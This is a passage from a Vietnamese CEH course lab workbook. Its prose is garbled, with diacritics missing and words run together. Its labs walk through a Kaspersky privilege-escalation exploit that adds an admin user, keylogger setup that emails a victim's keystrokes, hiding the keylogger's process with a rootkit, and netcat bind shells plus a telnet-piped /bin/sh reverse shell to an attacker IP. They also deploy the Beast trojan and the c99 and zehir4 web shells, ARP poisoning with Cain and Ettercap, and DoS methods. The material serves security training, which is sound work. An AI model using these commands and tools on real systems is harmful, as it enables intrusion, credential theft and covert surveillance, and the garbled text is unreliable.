Sau ta s dng on code ny bin dch thy file exe tn cng vo my nnnhn. thc hnh bi Lab, ta cn phi ci phn mm Kaspersky vo my. Sau khi ci xongta thm vo my 1 user bnh thng,v tin hnh log on vo user ny, Trong bi ta s dnguser hao v password l hao.
7/28/2019 VanLuong.blogspot.com CEH
24/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 24
Chy file exe c bin dch exploit vo Kaspersky ang chy di quynadmin h thng.
S dng lnh telnet 127.0.0.1 8080 truy xut vo shell c quyn admin hthng. Ta tip tc s dng lnh Net Localgroup administrators hao /add add user haovo nhm admin, v s dng lnh net user ti xc nhn
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\WINDOWS\system32>
D:\WINDOWS\system32>net Localgroup administrators hao /add
net Localgroup administrators hao /add
The command completed successfully.
D:\WINDOWS\system32>net user hao
net user hao
User name hao
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/3/2007 1:47 PM
Password expires 9/15/2007 12:35 PM
Password changeable 8/3/2007 1:47 PM
Password required Yes
7/28/2019 VanLuong.blogspot.com CEH
25/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 25
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directoryLast logon 8/3/2007 1:54 PM
Logon hours allowed All
Local Group Memberships *Administrators *UsersGlobal Group memberships *None
The command completed successfully.
D:\WINDOWS\system32>
Ta thy user hao by gi c quyn Admin trong h thng, v vic nng quyn thnh cng. Cc bn c th test nhng phn mm tng t t code down t trangwww.milw0rm.com.
Bi Lab 4: Sdng KeyloggerTrong bi lab ny, ta s dng phn mm SC Keylogger thu thp thng tin t my
ca nn nhn, vic phi lm phi to ra file keylog, chn mail server relay, ci vo nn nhn.
Sau khi ci phn mm ti file keylogger, by gi ta bt u cu hnh cho sn phmkeylogger ca mnh. u tin ta chn hnh ng c ghi log file bao gm ghi keyboard,
Mouse, v chng trnh chy.
7/28/2019 VanLuong.blogspot.com CEH
26/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 26
Tip theo ta chn thng tin email m my nn nhn s gi logfile ny. Thng tin nyc gi 10 pht 1 ln.
Tip theo ta cu hnh mail server relay, v thng tin v process hin th, phn nyhacker thng thng s dng nhng tn ging vi nhng service c sn trn Window nhsvchost.exe,csrss.exev.v nh la ngi admin. d nhn dng ta chn tn file lcehkeylogger.
Sau khi to xong keylogger, ta chy n trn my nn nhn. Ta chn 1 my Win XPno chy chng trnh ny v gi s sau nh on text sau:
7/28/2019 VanLuong.blogspot.com CEH
27/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 27
i khong 10 pht ta s thy logfile c gi v nh sau:
>> C:\WINDOWS\system32\notepad.exe
> Chuc lopSecCEH manh khoe, va nhieu thanh dat..
> Chuc lop CEH hoc gioi>::::::::::
> ms
>
C:\WINDOWS\system32\mspaint.exe
Theo nh trn, chng ta c th thy keyloger c th lu li hu nh ht tt c thng tintrn PC ca my nn nhn, c bit l cc thng tin nhy cm nh th tn dng, account, v.v.
Ngi vit khuyn co cc bn s dng kin thc vi mc ch nghin cu, khng s dngchng trnh ny vi mc ch xu.
Bi Lab 5: Sdng Rootkit v xa Log file
Rootkit l chng trnh lm n s hot ng ca keylogger, trojan, lm cho admin hthng kh khn trong vic pht hin. Trong bi thc hnh ta s dng Fu Rootkit n processca keylogger ta ci bi trc, ta s dng lnh tasklist xem cc process chy trong
my tnh.
7/28/2019 VanLuong.blogspot.com CEH
28/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 28
Nh ta thy trn hnh, proccess ca cehkeyloger.exe c PID l 1236, by gita s lnprocess ny bng lnh fu ph 1236 v th xem li cc process bng lnh tasklist.
7/28/2019 VanLuong.blogspot.com CEH
29/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 29
Ta thy keylogger bin mt khi tasklist, lc ny mun detect c chnh xcngi admin nn s dng trng trnh antivirus, kim sot truy nhp v chy nhng chngtrnh kim tra rootkit trong my nh rootkit detector.
7/28/2019 VanLuong.blogspot.com CEH
30/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 30
Bi 4:
TROJAN v BACKDOOR
I/ Gii thiu v Trojan v Backdoor:
Trojan v Backdoorc s dng gim st my nn nhn, v l ca sau Hacker c thvo li h thng my tnh thng qua cng kt ni(port), thng qua mi trng Web(webase).Loi s dng cng kt ni ta thng thy l netcat, beast, Donald Dick v.v. V loi s dngmi trng Webbase thng thng l r57,c99, zehir4v.v. c tnh ca Trojan kt ni port lmi ln kt ni phi m cng, v admin tng i pht hin d dng hn so vi loiWebbase(thng thng tn cng Web Server). Trong bi thc hnh, chng ta ci th cctnh nng ca netcat, beast, c99, zehir4 v phn tch 1 don code mu trojan.
II/ Cc bi thc hnh:
Bi 1 Sdng netcat:
1/Sdng netcat kt ni shell
Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l(listen) v -p port xc nh s hiu cng cn lng nghe, -e yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe(i vi NT) hoc bin/sh (i vi Unix).
E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error
- trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn
nhn trn cng nh, chng hn nh 8080
C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
Copyright 1985-1999 Microsoft Corp.
E:\>cd test
cd test
E:\test>dir /w
dir /w
Volume in drive E has no label.Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
7/28/2019 VanLuong.blogspot.com CEH
31/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 31
C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK
By gichng ta c c shell v kim soat c my nn nhn.Tuy nhin, sau kt ni
trn, netcat trn my nn nhn cngng lun. yu cu netcat lng nghe trli sau mi ktni, bn dng -L thaycho -l. Lu : -L ch c th p dng cho bn Netcat for Windows, khngp dng cho bn chy trn Linux.
2/Sdng netcat kt ni shell nghch chuyn by pass Firewall:- dng telnet ni ca s netcat ang lng nghe, k a lnh t ca s ny vo lungtelnet nghch chuyn, v gi kt qu vo ca s kia.
V d:
- trn my dng tn cng(172.16.84.1), m2 ca s netcat ln lt lng nghe trn cng 80v 25:
+ ca s Netcat (1)C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
connect to [172.16.84.1] from [172.16.84.2] 1055
pwd
ls -la
_
+ ca s Netcat (2)
C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (?n
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ?drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (?b
drwxr-xr-x 2 root root 7168 De = ? 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ?
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (?n
7/28/2019 VanLuong.blogspot.com CEH
32/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 32
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp
drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var
- trn my tnh nn nhn(172.16.84.2), telnet nghch chuyn n my dng tn cng(172.16.84.1), dng /bin/sh kt xut:
[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_
Telnet trn my nn nhn s chuyn tt c nhng g m chng ta g vo trongca s Netcat (1) - cng 80 kt xut sang cho /bin/sh thi hnh. Kt qu ca/bin/sh c kt xut trli cho my tnh dng tn cng trn ca s Netcat(2) - cng 25. Nhim v ca bn l ch cn g lnh vo ca s Netcat (1) v xemkt qu trong ca s Netcat (2).
Sdti chn cng 80 v 25 v cc cng ny thng khng b firewalls hocfilters lc.
Bi 2: Sdng Trojan Beast v detect trojan.
Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn,sau file server ny s lng nghe nhng port cnh v t my tn cng ta s connect vomy nn nhn thng qua cng ny.
Chn trojan Beast trong a CD v chy file to trojan.
Ta c th s dng thm cc tnh nng nh AV-FW kill t Firewall trn my iphng, hoc inject vo 1 file khc nh notepad.exe, explore di dng dll. Ta s dngbutton Save Server ti ra file server.exe v chy file my nn nhn v kim tra trntaskmanager ca my nn nhn xem Trojan thc s hot ng.
7/28/2019 VanLuong.blogspot.com CEH
33/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 33
By gita s dng chng trnh ti my tn cng connect vo file Server chytrn my ca nn nhn.
Ta th s dng 1 s tnh nng nh l managers file download cc file mnh cn timy nn nhn, hay bn c shutdown, reboot my nn nhn thng qua tnh nng ca tagWindows
7/28/2019 VanLuong.blogspot.com CEH
34/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 34
Cch phng chng: Ngoi cch s dng cc chng trnh Anti Virus v Trojan, ta c thda v tnh cht thng thng nhng Trojan ny bt buc phi mport no ra ngoi, ta cth xem bng chng trnh Curr Port hay chng trnh fport.
7/28/2019 VanLuong.blogspot.com CEH
35/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 35
Da vo thng tin Currport cung cp ta c th xa ng dn ca file cehclass.exe vxa nhng thng tin v n trong regedit, v startup v.v.
Bi 3: Sdng Trojan di dng Webbase
Trojan dng webbase thng thng ph bin hn trong mi trng web, sau khihacker khai thc c l hng v chim quyn s dng Web Server, hacker s li trojandi dng Webbase v thng qua Trojan ny hacker c th ra vo h thng cho nhng ln sau.c im ca loi Trojan ny l rt kh pht hin, v no chy di dng Web v s dngnhng hm truy sut h thng thng qua cc ngn ng asp, phpv.v, v vy n khng th d
pht hin nh loi trojan kt ni nh netcat, beast v.v.
thc hin bi lab ny trc tin ta phi ci t Web Server gm IIS v Apache.
1/Trojan di dng Web vi ngn ng ASP: Ta s dng Web Server IIS viTrojan c vit bng ngn ng ny, ngi vit gii thiu vi cc bn 2 trojan tiu biu lcmd.asp v zehir4.asp
u tin bn ci t dch v Web IIS(vic ci t kh n gin, hc vin c th tmnh lm phn ny), chp 2 file vo th mc www truy cp thng qua Web.
7/28/2019 VanLuong.blogspot.com CEH
36/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 36
Ta nh vo lnh Dir xem thng tin cc file trong h thng, vi trojan nh trn tac th xem c cc thng tin h thng, c th upload,download thng qua tftp, v add uservo h thng v d lnh net user hao hao /add, net Localgroup administrators hao /add .
Vo linkhttp://192.168.1.116/zehir4.asp xem v trojan webbase th 2.
Ta thy Trojan ny hng ha v tin dng hn, vic ly file,xa file hon tonthng qua web, chng ta c th d dng thao tc trn my ca nn nhn.2/Trojan vi ngn ng PHP: Ta s dng Web server Apache vi trojan c vit bngngn ng ny, ngi vit gii thiu n cc bn trojan tiu biu l c99.
u tin bn s dng chng trnh phpeasy ci kt hp 3 gi sau apache, php, vmysql. Tuy nhin trong bi cc bn ch cn s dng php v apache. Chp cc file trojan v thmc www c th chy c cc file ny.
7/28/2019 VanLuong.blogspot.com CEH
37/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 37
y l file trojan rt nguy him, n va c th download, upload file, ng thi h trchng ta chy nhng ng dng nh perl, thc thi cc hm h thng, cung cp thng tin v nnnhn hin hnhv.v. Do tnh cht nh vy cho nn Trojan ny c hacker dng rt rng
ri(ngoi ra cn c r57, phpshellv.v).
7/28/2019 VanLuong.blogspot.com CEH
38/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 38
Bi 5:
CC PHNG PHP SNIFFER
I/ Gii thiu v SnifferA. TNG QUAN SNIFFER
Sniffer c hiu n gin nh l mt chng trnh c gng nghe ngng cc lulng thng tin trn mt h thng mng
Snifferc s dng nh mt cng c cc nh qun tr mng theo di v bo tr hthng mng. V mt tiu cc, snifferc s dng nh mt cng c vi mc ch nghe lncc thng tin trn mng ly cc thng tin quan trng
Sniffer da vo phng thc tn cng ARP bt gi cc thng tin c truyn quamng.
Tuy nhin nhng giao dch gia cc h thng mng my tnh thng l nhng d liu dngnh phn (binary). Bi vy hiu c nhng d liu dng nh phn ny, cc chng trnhSniffer ny phi c tnh nng phn tch cc nghi thc (Protocol Analysis), cng nh tnh nnggii m (Decode) cc d liu dng nh phn hiu c chng
Mt s cc ng dng ca Sniffer c s dng nh: dsniff, snort, cain, ettercap,sniffer pro
B. HOT NG CA SNIFFER
Sniffer hot ng ch yu da trn dng tn cng ARP.
TN CNG ARP
1. Gii thiuy l mt dng tn cng rt nguy him, gi l Man In The Middle. Trong trng hp
ny ging nh bt my nghe ln, phin lm vic gia my gi v my nhn vn din rabnh thng nn ngi s dng khng h hay bit mnh b tn cng
2. SLc Qu trnh hot ng
Trn cng mt mng, Host A v Host B mun truyn tin cho nhau, cc Packet sc axung tng Datalinkng gi, cc Host phi ng gi MAC ngun, MAC ch vo Frame.
Nh vy trc khi qu trnh truyn D liu, cc Host phi hi a ch MAC ca nhau.
Nu nh Host A khi ng qu trnh hi MAC trc, n s gi broadcast gi tin ARP request
cho tt c cc Host hi MAC Host B, lc Host B c MAC ca Host A, sau Host Bch tr li cho Host A MAC ca Host B(ARP reply ).
C 1 Host C lin tc gi ARP reply cho Host A v Host B a ch MAC ca Host C, nhng lit a ch IP l Host A v Host B. Lc ny Host A c nghmy B c MAC l C. Nh vycc gi tin m Host A gi cho Host B u ba n Host C, gi tin Host B tr li cho HostA cng a n Host C. Nu Host C bt chc nng forwarding th coi nh Host A v Host Bkhng h hay bit rng mnh b tn cng ARP
7/28/2019 VanLuong.blogspot.com CEH
39/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 39
.
V d:
Ta c m hnh gm cc host
Attacker: l my hacker dng tn cng ARP
IP: 10.0.0.11MAC: 0000.0000.1011
Victim: l my b tn cng
IP: 10.0.0.12
MAC: 0000.0000.1012
HostA
IP: 10.0.0.13
MAC: 0000.0000.1013
- u tin, HostA mun gi d liu cho Victim, cn phi bit a ch MAC ca Victim lin lc. HostA s gi broadcast ARP Request ti tt c cc my trong cng mngLAN hi xem IP 10.0.0.12 (IP ca Victim) c a ch MAC l bao nhiu.
- Attacker v Victim u nhn c gi tin ARP Request, nhng ch c Victim gi trli gi tin ARP Reply li cho HostA. ARP Reply cha thng tin v IP 10.0.0.12 vMAC 0000.0000.1012 ca Victim
- HostA nhn c gi ARP Realy t Victim, bit c a ch MAC ca Victim l0000.0000.1012 s bt u thc hin lin lc truyn d liu n Victim. Attackerkhng th xem ni dung d liu c truyn gia HostA v Victim
My Attacker mun thc hin ARP attacki vi my Victim. Attacker mun mi gi tinHostA gi n my Victim u c th chp li c xem trm
- Attacker thc hin gi lin tc ARP Reply cha thng tin v IP ca Victim 10.0.0.12,cn a ch MAC l ca Attacker 0000.0000.1011.
- HostA nhn c ARP Reply ngh rng IP Victim 10.0.0.12 c a ch MAC l0000.0000.1011. HostA lu thng tin ny vo bng ARP Cache v thc hin kt ni.
- Lc ny mi thng tin, d liu HostA gi ti my c IP 10.0.0.12 (l my Victim) sgi qua a ch MAC 0000.0000.1011 ca my Attacker.
Host A Host B
Host C
7/28/2019 VanLuong.blogspot.com CEH
40/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 40
CAIN (Sdng phn mm CAIN)
1.Yu cu v phn cng:
- cng cn trng 10 Mb-hiu hnh Win 2000/2003/XP-cn phi c Winpcap
2. Ci t:
Chn Next.
7/28/2019 VanLuong.blogspot.com CEH
41/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 41
Chn Next.
Chn Finish.
7/28/2019 VanLuong.blogspot.com CEH
42/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 42
7/28/2019 VanLuong.blogspot.com CEH
43/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 43
7/28/2019 VanLuong.blogspot.com CEH
44/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 44
3. Cu hnhCain & Abel cn cu hnh mt vi thng s, mi th c thc iu chnh thng qua bngConfiguration dialog .
Sniffer tab:
-Ti y chng ta chn card mng s dng tin hnh sniffer v tnh nng APR . Check vo Option kch hot hay khng kch hot tnh nng.
-Sniffer tng thch vi Winpcap version 2.3 hay cao hn . Version ny h trcard mng rtnhiu .
7/28/2019 VanLuong.blogspot.com CEH
45/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 45
APR tab:
-y l ni bn c th config ARP . Mc nh Cain ngn cch 1 chui gi gi ARP t nnnhn trong vng 30 giy . y thc s l iu cn thit bi v vic xm nhp vo thit b cth s gy ra s khng lu thng tnh hiu . T dialog ny bn c th xc nh thi gian giami ln thc thi ARP, xc nh thng s t s to cho ARP lu thng nhiu,ngc li s khkhn hn trong vic xm nhp .
-Ti mc ny, ta cn ch ti phn Spoofing Options:+Mc u tin cho php ta s dng a ch MAC v IP thc ca my m mnh dang s dng.
+Mc th hai cho php s dng mt IP v a ch MAC gi mo.
(Lu a ch ta chn phi khng trng vi IP ca my khc)
Khi click vo tab filters and ports, ta s thy mt s thng tin v giao thc v cc con s porttng ng vi giao thc .
7/28/2019 VanLuong.blogspot.com CEH
46/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 46
Fliter and Ports Tab:
-Ti y bn c th chn kch hot hay khng kch hot cc port ng dng TCP/UDP .
HTTP fields tab:
7/28/2019 VanLuong.blogspot.com CEH
47/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 47
-Ti y c 1 list danh sch username v password s dng c HTTP sniffer lc li.-Ti tab ny cho php ta bit dc chng trnh ny s bt 1 s thng tin v trang web nh:+ Mc Username Fields: n s ly thng tin nhng g lin quan n ci tn (user name,
account, web name v.v..) .
+ Mc Password Fields: lanh vc ny sm nhim vai tr ly thng tin v password(login password, user pass, webpass v.v)
4. Cc ng dng ca CAIN:
+ Bo v password manager:
Trc ht n c s dng nh 1 private key bo mt mt s vn cho user . Hu htthng tin trong Protected Storage c m ha.S dng nh 1 key nhn c t viclogon password ca user.Cho php iu ha vic truy cp thng tin owner c th anton truy xut .
Mt vi ng dng ca Windows c nt c trng nn s dng dch v ny: InternetExplorer, Oulook, Oulook Express
+ Gii m password manager:
N cho php bn a user names v passwords cho 1 ti nguyn mng khc v 1 ngdng,sau h thng tng cung cp thng tin v nhng s ving thm thng tin m
bn khng can thip.
+ LSA secrets dumper:
LSA secrets th s dng thng tin password cho accounts dng start mt dch v khcd liu cc b. Dial Up v mt sng dng khc xc nh password nm y .
+ Gii m password Dial-Up:
7/28/2019 VanLuong.blogspot.com CEH
48/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 48
+APR:
APR l nt c trng chnh ca chng trnh .N cho php lng nghe v cc mng chuynmch v s tn cng lu thng IP gia cc host . APR poinsion routing thc hin: tncng v nh tuyn chnh xc a chch
APR tn cng cbn thng qua thao tc ca host ARP.Trn 1 a ch IP hay Ethernet khim 2 host mun truyn tin ln nhau th phi bit a ch MAC addresses ca nhau. Host gcthy bng ARP nu m y c 1 MAC addresses tng ng vi a ch IP addresses can. Nu khng, n l a ch broadcasts,mt li yu cu ARP hi a ch MAC ca a chch. Bi v gi thng tin ny c gi trong min broadcasts, n si n nhng ci hostcng subnet, tuy nhin host vi IP address trn l thuyt khi nhn c yu cu s tr li lia ch MAC gc ca n. Tri li nu ARP-IP tip cn a chch ca host th n sn sng
a ra soure host trn ARP cache. iu ny sc dng pht sinh lu thng ARPConfig:Cn chnh 1 vi thng s, iu ny c th thc hin c bng vic ch r vic bt chc
MAC v IP addresses bng vic s dng ARP poision packets . iu ny tht s kh khnkhi khng li vt tch ca vic tn cng bi v ngi tn cng thc t khng bao gigia ch qua li trn mng.Trn mng ngi tn cng lc no cng ln lc gia quan st
7/28/2019 VanLuong.blogspot.com CEH
49/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 49
Hnh trn l ta mun tn cng ip t 192.168.0.1 ( 192.168.0.10 .Cng vic tin hnh theo cch Ngi gia, chng trnh s thc hin 1 s tn cng ARP poision, CAIN c th phttrin s tn cng b nhCa nhiu host trong khong thi gian nh nhau, bn cn chn 1 ach bn tri
+ Service manager: ta c th start/stop,pause/continued hay remove bt c 1 dch v no ctrn ca s giao din
7/28/2019 VanLuong.blogspot.com CEH
50/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 50
+ Sniffer:
ARP-DNS:
Nt c trng y l cho php DNS tin hnh gi mo thnh 1 DNS-reply c th tncng.
ARP-DNS d dng to ra 1 ip address trn DNS-reply .Sniffer d dng rt ra c tn yu cut gi d liu kt hp vi vic thy c a ch trn bng danh sch.y gi d liu sc chnh li IP address sau re-route i .Lc ny client s bnh la ta d dng
bit c a chch .
ARP-HTTPS:
7/28/2019 VanLuong.blogspot.com CEH
51/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 51
ARP-HTTPS cho php vic bt gi v gii m trong s lu thng ca HTTPS gia cc host .y l cng vic kt hp vi cng c Certificate Collector . Khi m nn nhn Start HTTPStrnh duyt ca anh ta s hin ln po-pup bo ng .
7/28/2019 VanLuong.blogspot.com CEH
52/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 52
+ Certificates Collector:
7/28/2019 VanLuong.blogspot.com CEH
53/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 53
7/28/2019 VanLuong.blogspot.com CEH
54/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 54
ETTERCAP
1. Gii Thiu
Ettercap l chng trnh phn tch cc gi tin gi qua mng, v th Ettercap cng l mt phnmm hiu nghim cho php ngi s dng nh hi cc d liu trn mng LAN, k cnhng thng tin c m ha. Ettercap c th gi danh a ch MAC ca card mng b tncng, thay v gi tin c truyn n my tnh cn n th n li c truyn n my tnh cci ettercap ri sau mi truyn n my tnh ch
2. Install trn Linux
Trc khi Install, chng ta cn chun b 3 gi ci sau:
+ ettercap-NG-0.7.1.tar c th download t website
http://prdownloads.sourceforge.net/ettercap+ libpcap-0.8.1.tar
+ libnet-1.1.2.1.tar c th download t website
http://www.packetfactory.net/libnet/dist/
Install libnet:
1. # tar zxvf libnet-1.1.2.1.tar.gz2. # cd libnet3. # ./configure4. # make5. # make installInstall libpcap:
6. # tar zxvf libpcap-1.1.2.1.tar.gz7. # cd libpcap8. # ./configure9. # make10.# make installInstall ettercap:
1. # tar zxvf ettercap-NG-0.7.1.tar.gz2. # cd ettercap-NG-0.7.13. # ./configure4. # make
7/28/2019 VanLuong.blogspot.com CEH
55/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 55
5. # make installQu trnh ci t hon tt, trn ca s console xut hin nhng dng thng bo
3. Cu Hnh v S Dng Ettercap
- Mgiao din Ettercap bng cch g dng lnh# ettercap C
7/28/2019 VanLuong.blogspot.com CEH
56/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 56
- Trc khi tin hnh cu hnh, ta kim tra option Promisc mode c dc check cha, nucha th chn check
- Trong menu sniff, chn Unified sniffing..
7/28/2019 VanLuong.blogspot.com CEH
57/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 57
- Chn card mng s dng
- khi ng qu trnh lng nghe, chn menu start, start sniffing
7/28/2019 VanLuong.blogspot.com CEH
58/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 58
Ti dng User Messages se xut hin thng bo cho bit dch vang start ln
- Trong menu Host, chn Scan from hosts
7/28/2019 VanLuong.blogspot.com CEH
59/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 59
- Trong menu Mitm, chn Arp poisoning
7/28/2019 VanLuong.blogspot.com CEH
60/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 60
-Khng chn parameters, nhn enter b qua-Ti dng User messages xut hin thng bo
7/28/2019 VanLuong.blogspot.com CEH
61/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 61
- xem cc host c qut, chn Connections, trong menu View
bt gi, chn host no ang ch active, s hin ra bn cc gi bt c, cc giny s hin th di dng m ha
7/28/2019 VanLuong.blogspot.com CEH
62/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 62
- Chn Log all packets and infos trong menu Logging save nhng file logs cha ccgi bt c li
- c thc c cc gi di dng m ha , trong ca s console, g lnh# etterlog p k i ascii logfile.eci | less
4. Tnh Nng Ca Ettercap
Ettercap cung cp cho ta mt s plug-in, bng cch chn nhng plug-in ny, ta c thngdng mt s tnh nng quan trng ca ettercap
7/28/2019 VanLuong.blogspot.com CEH
63/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 63
Ngoi ra Ettercap cn c 2 plug-in rt quan trng l arpcop v leech
7/28/2019 VanLuong.blogspot.com CEH
64/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 64
N cho php ta c th dng chnh Ettercap bo v my mnh trc cc chng trnh snifferkhc trn mng
1. Arpcop: Nu nghi ngai ang nghe ln trn mng, bn khi ng ettercap v chnplug-in ny, i tng s dng ettercap hay dsniff ta vn c th d tm c, lc mt cas mi s hin th nhng my tnh ang chy cc chng trnh spoofing arp trn mng.
2. Leech: Khi xc nhn c i tng tn cng, ta c th tin hnh c lp my tnh nykhi mng ngay lp tc bng cch s dng plug-in ny. Cn c th dng ettercap pht hincc my b nhim virus ang pht tn trn mng ri c lp chng bng leech, sau dit bngcc chng trnh chng virus rt hiu qu.
7/28/2019 VanLuong.blogspot.com CEH
65/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 65
Bi 6:
Tn Cng tchi dch v DoS
I/ Gii thiu:
DoS attack l g? (Denial Of Services Attack )
DoS attack (dch l tn cng t chi dch v ) l kiu tn cng rt li hi, vi loi tn cngny, bn ch cn mt my tnh kt ni Internet l c th thc hin vic tn cng c mytnh ca I phng . thc cht ca DoS attack l hacker s chim dng mt lng ln tinguyn trn server (ti nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm choserver khng th no p ng cc yu cu t cc my ca ngui khc (my ca nhng ngidng bnh thng ) v server c th nhanh chng b ngng hot ng, crash hoc reboot .
Cc loi DoS attack hin ang c bit n v s dng:
a.) Winnuke:
- DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x . Hacker sgi cc gi tin vi d liu Out of Band n cng 139 ca my tnh ch. (Cng 139 chnhl cng NetBIOS, cng ny ch chp nhn cc gi tin c cOut of Band c bt). Khi mytnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li sc hin th ln vinn nhn do chng trnh ca Windows nhn c cc gi tin ny nhng n li khng bit
phn ng vi cc d liu Out Of Band nh th no dn n h thng s b crash .
b.) Ping of Death:
- kiu DoS attack ny, ta ch cn gi mt gi d liu c kch thc ln thng qua lnh pingn my ch th h thng ca h s b treo.
- VD: ping l 65000
c . ) Teardrop:
- Nh ta bit, tt c cc d liu chuyn i trn mng t h thng ngun n h thng chu phi tri qua 2 qu trnh: d liu sc chia ra thnh cc mnh nhh thng ngun,mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh trong gi dliu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vo gi troffset sp xp cc mnh li vi nhau theo th tng nh ban u . Li dng sh, tach cn gi n h thng ch mt lot gi packets vi gi tr offset chng cho ln nhau. Hthng ch s khng th no sp xp li cc packets ny, n khng iu khin c v c th
b crash, reboot hoc ngng hot ng nu s lng gi packets vi gi tr offset chng choln nhau qu ln !
7/28/2019 VanLuong.blogspot.com CEH
66/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 66
d. ) SYN Attack:
